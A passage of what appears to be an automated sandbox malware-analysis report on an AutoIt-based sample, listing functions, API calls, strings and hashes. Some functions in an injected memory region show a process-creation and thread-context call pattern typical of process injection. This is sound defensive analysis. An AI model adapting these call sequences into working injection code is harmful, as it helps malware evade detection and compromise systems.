                    • Instruction ID: b5a2e466230adfa1946b0e32e5d0e73cf78477891bf1a2eca54de4c98e42180f
                    • Opcode Fuzzy Hash: 205c6c4733b78ec7903ab83eba81fc9bd63e652eadcd25be8535b68d9072b240
                    • Instruction Fuzzy Hash: 38F0D0B5641290BEEB3117176C49E673E7DE7C7F60B00812AF904A21B0C6ED5851DA79
                    Function 036823B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 036822A0: Sleep.KERNELBASE(000001F4), ref: 036822B1
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 036824E9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1674262971.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: E0BMD0J5JZ91Y
                    • API String ID: 2694422964-2772655244
                    • Opcode ID: 5a82d3a34d9a65303aa23dee2376ac79fc83dc622bfa76316a026a80e25912a3
                    • Instruction ID: c0acbcf0f855f8cd65742fe328b5d288144af0a2b8af752129b502255998596a
                    • Opcode Fuzzy Hash: 5a82d3a34d9a65303aa23dee2376ac79fc83dc622bfa76316a026a80e25912a3
                    • Instruction Fuzzy Hash: E2517130D14248DBEF11DBA4C825BEEB779AF58700F004699E609BB2C0D7B91B45CB6A
                    Function 0068410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006BD5EC
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    • _memset.LIBCMT ref: 0068418D
                    • _wcscpy.LIBCMT ref: 006841E1
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006841F1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: bf5af0bf90f14a34841ef08bd9655a6f517ed9c5136c0d624c3acc2bc676e6c6
                    • Instruction ID: 2628931ddcfb88b6478c5c6e3b171877eaae7ae0d3eb18496bcb78031ef52f7b
                    • Opcode Fuzzy Hash: bf5af0bf90f14a34841ef08bd9655a6f517ed9c5136c0d624c3acc2bc676e6c6
                    • Instruction Fuzzy Hash: 5431C471008305AAD771FB60DC45BDB77EAAF45304F10471EF185921A1EF789648C79B
                    Function 006A564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction ID: 3e8af1fbcd9361f7458b79431a60e62683a26ccc3b3291ab08ec2dd4872322cf
                    • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                    • Instruction Fuzzy Hash: C3519371A00B05DBDB24EF6988806AE77A7AF42320F648629F827A62E0D770DD518F40
                    Function 006D7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                    Download Yara Rule
                    APIs
                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?,?,006D799D), ref: 006D766F
                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D768A
                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D7698
                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?), ref: 006D76A8
                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006D758C,80070057,?,?), ref: 006D76B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: From$Prog$FreeStringTasklstrcmpi
                    • String ID:
                    • API String ID: 3897988419-0
                    • Opcode ID: 687c36255a2caaa08610ba64e306fc378f6c1971270604e819e68684d509703a
                    • Instruction ID: 8e18d6b80ce70df25cd6fbc04362f2d68ebd72b9e8c301bb54ad23e3400bac22
                    • Opcode Fuzzy Hash: 687c36255a2caaa08610ba64e306fc378f6c1971270604e819e68684d509703a
                    • Instruction Fuzzy Hash: E6017172A01614EBDB209F58DC44AAA7BAEEB44751F14812AFD04D2311FB35DE4197A0
                    Function 006869CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00684F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00684F6F
                    • _free.LIBCMT ref: 006BE68C
                    • _free.LIBCMT ref: 006BE6D3
                      • Part of subcall function 00686BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00686D0D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: 153ee1233034de3cfb234ec54a2f4ce339ffd012ce44edd881f9980a75f9ac44
                    • Instruction ID: fceab8e7c0dea1a0ba174571937e70b8927c4b154fb91c3b9c5649f11a210c1e
                    • Opcode Fuzzy Hash: 153ee1233034de3cfb234ec54a2f4ce339ffd012ce44edd881f9980a75f9ac44
                    • Instruction Fuzzy Hash: 26919CB1910219EFCF14EFA4C8819EDB7B6FF19304F10452EF816AB291EB31A945CB64
                    Function 006835B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,006835A1,SwapMouseButtons,00000004,?), ref: 006835D4
                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,006835A1,SwapMouseButtons,00000004,?,?,?,?,00682754), ref: 006835F5
                    • RegCloseKey.KERNELBASE(00000000,?,?,006835A1,SwapMouseButtons,00000004,?,?,?,?,00682754), ref: 00683617
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: 33e229733c18c78f5fe6e01822f3c400a5bd0778d25632012a502c4b3309a213
                    • Instruction ID: 13b56e7510382098fbec269d9754521d507d996dee37d3ffc1866670da4e22cf
                    • Opcode Fuzzy Hash: 33e229733c18c78f5fe6e01822f3c400a5bd0778d25632012a502c4b3309a213
                    • Instruction Fuzzy Hash: F3114871510228FFDB209F68DC409EEB7B9EF04B40F008669E805D7310E6719E809764
                    Function 036812A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03681A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03681AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03681B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.1674262971.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                    • Instruction ID: 66103cbd2cf4c1f6c4bcc6a2b9f639ae5619bb79c82f90f6f845bb9199ef73f6
                    • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                    • Instruction Fuzzy Hash: 05621934A14258DBEB24DFA4C854BDEB376EF58300F1091A9D10DEB390E77A9E81CB59
                    Function 006D76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c9d43f29c99354b737a34d1ca6bdffb403e1309eafb7eb39f73d5c694020417c
                    • Instruction ID: 91abadd55981151d4e05f06aa44b719b1a95af415172c07c72833fce97c569a5
                    • Opcode Fuzzy Hash: c9d43f29c99354b737a34d1ca6bdffb403e1309eafb7eb39f73d5c694020417c
                    • Instruction Fuzzy Hash: 23C15B75E04216EFCB14CF94C884AAEB7B6FF48710B15859AE805EB351E730ED81DB91
                    Function 006F83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 006F83D8
                    • CoUninitialize.OLE32 ref: 006F83E3
                      • Part of subcall function 006DDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006DDAC5
                    • VariantInit.OLEAUT32(?), ref: 006F83EE
                    • VariantClear.OLEAUT32(?), ref: 006F86BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                    • String ID:
                    • API String ID: 780911581-0
                    • Opcode ID: 502eb78919ef828bcb1eb4df834035cff045ec927a16a73931ce051d758cd92a
                    • Instruction ID: b2107156f4efd1c7c8193da7e10caecbb47b5e2f93262cf7be8949c4cbe0e765
                    • Opcode Fuzzy Hash: 502eb78919ef828bcb1eb4df834035cff045ec927a16a73931ce051d758cd92a
                    • Instruction Fuzzy Hash: 41A16E752047059FDB50EF14C881B6AB7E6BF88314F08858DFA9A9B3A1CB30ED05CB56
                    Function 006E97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00685045: _fseek.LIBCMT ref: 0068505D
                      • Part of subcall function 006E99BE: _wcscmp.LIBCMT ref: 006E9AAE
                      • Part of subcall function 006E99BE: _wcscmp.LIBCMT ref: 006E9AC1
                    • _free.LIBCMT ref: 006E992C
                    • _free.LIBCMT ref: 006E9933
                    • _free.LIBCMT ref: 006E999E
                      • Part of subcall function 006A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,006A9C64), ref: 006A2FA9
                      • Part of subcall function 006A2F95: GetLastError.KERNEL32(00000000,?,006A9C64), ref: 006A2FBB
                    • _free.LIBCMT ref: 006E99A6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: fd18de759458e21508ccb8b902dfc4ac475c3880c7526805842eb646ad61b447
                    • Instruction ID: 4e8d4ad69b3cf8bed88d7b818848fd0656e87b90f43503d0051a11c150775d14
                    • Opcode Fuzzy Hash: fd18de759458e21508ccb8b902dfc4ac475c3880c7526805842eb646ad61b447
                    • Instruction Fuzzy Hash: 2D5160B1D04358AFDF649F65CC81A9EBBBAEF48300F0404AEB609A7241DB715E90CF58
                    Function 006A493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction ID: 883a9e3463aba81579e3ad30ce4b5bf2b94efdf66ce5a966a98e08cde8bf112e
                    • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                    • Instruction Fuzzy Hash: A141D3306006069FDB28AEA9CC809AF77A7AFC2360B24817DE955C7644DFB09D518F44
                    Function 00684531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00684560
                      • Part of subcall function 0068410D: _memset.LIBCMT ref: 0068418D
                      • Part of subcall function 0068410D: _wcscpy.LIBCMT ref: 006841E1
                      • Part of subcall function 0068410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006841F1
                    • KillTimer.USER32(?,00000001,?,?), ref: 006845B5
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 006845C4
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006BD6CE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: 15d1076f3b4c691423d8cd8e16a456e905bddee462de0d4c65442b304f60e807
                    • Instruction ID: edee87369b28a3565987ba16aeed5d50c31d917c1520f353131b7f476de3e168
                    • Opcode Fuzzy Hash: 15d1076f3b4c691423d8cd8e16a456e905bddee462de0d4c65442b304f60e807
                    • Instruction Fuzzy Hash: 47213EB0904784AFEB329B24CC45BEBBBED9F01304F04019EE69D9A341DB741AC5CB56
                    Function 00684DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: AU3!P/q$EA06
                    • API String ID: 4104443479-2587288268
                    • Opcode ID: d458243787e87f72cceaf1b1f37cd1b6dd72d0aa2c08c72da2f3d158b1c00cb8
                    • Instruction ID: 840e148a5a4a9773b22eb950f2ef34758a901f7c85917c2ed29a58cf0450e25e
                    • Opcode Fuzzy Hash: d458243787e87f72cceaf1b1f37cd1b6dd72d0aa2c08c72da2f3d158b1c00cb8
                    • Instruction Fuzzy Hash: E5417C71A042599BCF21BB64C8557FE7FA7AF45300F284279FD829B282DE358D8187A1
                    Function 006873E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 006BEE62
                    • GetOpenFileNameW.COMDLG32(?), ref: 006BEEAC
                      • Part of subcall function 006848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006848A1,?,?,006837C0,?), ref: 006848CE
                      • Part of subcall function 006A09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006A09F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen_memset
                    • String ID: X
                    • API String ID: 3777226403-3081909835
                    • Opcode ID: 5e5867e07e8646f3a05b74602c566ba84afd2cb456a7702b0a194d9ba3a85ae6
                    • Instruction ID: 95daaccbd0c6c7ef5b6d7345367228b928133b147969a48e3b9871c97efee6f5
                    • Opcode Fuzzy Hash: 5e5867e07e8646f3a05b74602c566ba84afd2cb456a7702b0a194d9ba3a85ae6
                    • Instruction Fuzzy Hash: 8121C9709002589BDF51EF94C8457EE7BF99F49314F10405AE508E7241DBF8998A8F95
                    Function 006E901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    • Opcode ID: 9d43d159fe541af7851536ecf65f6eb93b7a750dffd450068b47bfbeff818fb9
                    • Instruction ID: 6aaa09988a792a83dbbdfd2b5b3caa44eea0fd52bc20db4b878fe857dfd92d6a
                    • Opcode Fuzzy Hash: 9d43d159fe541af7851536ecf65f6eb93b7a750dffd450068b47bfbeff818fb9
                    • Instruction Fuzzy Hash: 0101F9718042587EDB28D7A8C816EEE7BF89F11301F00419EF552D2181E579AA048B60
                    Function 006E9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 006E9B82
                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 006E9B99
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: b8888b113ec61a4e2cb01098cc402d2dab5403e8ef774bdb2ff26e69c3364a15
                    • Instruction ID: fc09d9d2a82abe04293c31d87c79e43df4e26fde004d2d09d8df31d605faaf12
                    • Opcode Fuzzy Hash: b8888b113ec61a4e2cb01098cc402d2dab5403e8ef774bdb2ff26e69c3364a15
                    • Instruction Fuzzy Hash: 2DD05E7954130EBBDB20AB94EC0EF9A772CE704700F0082A1FE94910A2DEB865988B95
                    Function 006FCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: faa85f51f8a419bd6c4ae4bb4db8315dc92ccc45dae097251e9d84887268e64f
                    • Instruction ID: 4929b593a7ea2a655569be976839f28108632ca1d82aa8289f6b4f6ae9d88109
                    • Opcode Fuzzy Hash: faa85f51f8a419bd6c4ae4bb4db8315dc92ccc45dae097251e9d84887268e64f
                    • Instruction Fuzzy Hash: 80F16C709083059FC754DF28C484A6ABBE6FF88314F14892EF9999B351DB31E946CF86
                    Function 006843DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00684401
                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 006844A6
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 006844C3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
